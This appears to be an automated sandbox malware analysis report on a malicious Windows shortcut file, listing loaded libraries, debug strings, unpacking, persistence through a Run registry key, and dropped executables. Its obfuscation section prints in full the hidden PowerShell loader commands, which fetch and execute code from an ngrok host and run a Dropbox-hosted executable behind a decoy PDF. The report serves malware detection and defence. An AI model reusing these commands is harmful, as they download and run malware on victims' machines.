                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                    Source: QhR8Zp6fZs.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: D:\Jenkins\workspace\ccd-app\main\native\win32\build\msvs_win32_x86\Release\x86\sym\AdobeUpdateService\AdobeUpdateService\AdobeUpdateService.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572863734.000000000049E000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000000.2748729244.000000000049E000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: softy.pdb^ source: powershell.exe, 00000016.00000002.2686528755.000001A0BC069000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: softy.pdbll source: powershell.exe, 00000016.00000002.2686528755.000001A0BC069000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2689297753.000001A8BD4B9000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000002.2684869746.000001A0BBFB0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763137608.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763301834.0000000004F90000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000003.2769045343.00000000054C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ystem.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000016.00000002.2691184239.000001A8BD5C8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763809170.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2764066518.0000000005090000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2761257758.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2761700335.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2762652630.0000000005010000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2762348726.0000000004E70000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: CallSite.Target.pdbM!< source: powershell.exe, 00000016.00000002.2690919569.000001A8BD585000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2761257758.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2761700335.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2762652630.0000000005010000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2762348726.0000000004E70000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.resources, Version=3.0.0.0, Culture=en-GB, PublicKeyToken=31bf3856ad364e35.pdb source: powershell.exe, 00000016.00000002.2691184239.000001A8BD5C8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32p; source: powershell.exe, 00000016.00000002.2687416084.000001A0BC0A0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763137608.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763301834.0000000004F90000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000003.2769045343.00000000054C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763809170.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2764066518.0000000005090000.00000004.00000001.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeUnpacked PE file: 32.2.148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.4380000.3.unpack
                    PowerShell case anomaly found
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }"
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.22.drStatic PE information: real checksum: 0x22448d should be: 0x2d97e4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346A00BD pushad ; iretd 3_2_00007FFD346A00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346A42E0 pushad ; ret 3_2_00007FFD346A42FD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD346D845E push eax; ret 22_2_00007FFD346D846D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD346D00BD pushad ; iretd 22_2_00007FFD346D00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD346D8426 pushad ; ret 22_2_00007FFD346D845D
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_0046A0C9 push ecx; ret 32_2_0046A0DC
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_00404268 push ebp; retf 32_2_00404269
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0271B86D push ebx; ret 33_3_0271B864
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0271A840 push ebp; retf 33_3_0271A841
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0271E83C pushad ; ret 33_3_0271E841
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0271E80E push eax; iretd 33_3_0271E81D
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0271A0F9 push FFFFFF82h; iretd 33_3_0271A0FB
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0271D8A0 push 0000002Eh; iretd 33_3_0271D8A2
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_02718904 push ecx; ret 33_3_02718917
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0271B1DD push eax; ret 33_3_0271B1DF
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_02719F6A push eax; ret 33_3_02719F75
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0271B70B push ebx; ret 33_3_0271B864
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0271E586 pushad ; retf 33_3_0271E599
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_2_0046A0C9 push ecx; ret 33_2_0046A0DC
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_2_00404268 push ebp; retf 33_2_00404269
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E5F0C push es; iretd 34_3_030E5F0D
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E4920 push 0000002Eh; iretd 34_3_030E4922
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E1179 push FFFFFF82h; iretd 34_3_030E117B
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E278B push ebx; ret 34_3_030E28E4
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E5FEE push FFFFFFD2h; retf 34_3_030E6011
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E0FEA push eax; ret 34_3_030E0FF5
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E5606 pushad ; retf 34_3_030E5619
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E6012 push 00000038h; iretd 34_3_030E601D
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E225D push eax; ret 34_3_030E225F
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E588E push eax; iretd 34_3_030E589D
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E58BC pushad ; ret 34_3_030E58C1
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.22.drStatic PE information: section name: .text entropy: 6.829135429512295
                    Source: PerfectoUna.exe.32.drStatic PE information: section name: .text entropy: 6.829135429512295

                    Persistence and Installation Behavior

                    barindex
                    Windows shortcut file (LNK) starts blacklisted processes
                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Drops PE files to the document folder of the user
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeFile created: C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeFile created: C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_004029A0 StartServiceCtrlDispatcherW,GetLastError,32_2_004029A0
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nuinsa
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nuinsa

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
